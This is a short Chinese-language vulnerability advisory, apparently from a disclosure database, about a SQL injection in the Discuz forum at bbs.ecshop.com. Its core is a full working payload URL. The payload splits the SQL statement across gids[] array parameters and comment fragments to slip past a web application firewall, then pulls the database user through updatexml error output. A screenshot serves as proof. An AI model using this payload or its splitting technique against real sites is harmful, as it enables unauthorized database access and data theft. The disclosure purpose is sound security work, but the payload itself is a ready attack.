ecshop_dz论坛注入可以绕过WAF

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 注入不是亮点,亮点在于绕过waf,专业绕waf,30年。 ### 详细说明: 利用DZ本漏洞的特性,拆开sql语句。 http://bbs.ecshop.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and 1=(updatexml(1,concat(0x5e24,(/* &gids[101][0]=*/select user/* &gids[102][0]=*/()),0x5e24),1))%23 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg" alt="QQ截图20140703000300.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/030003189508c879fa1d2e2636d541196dad9470.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息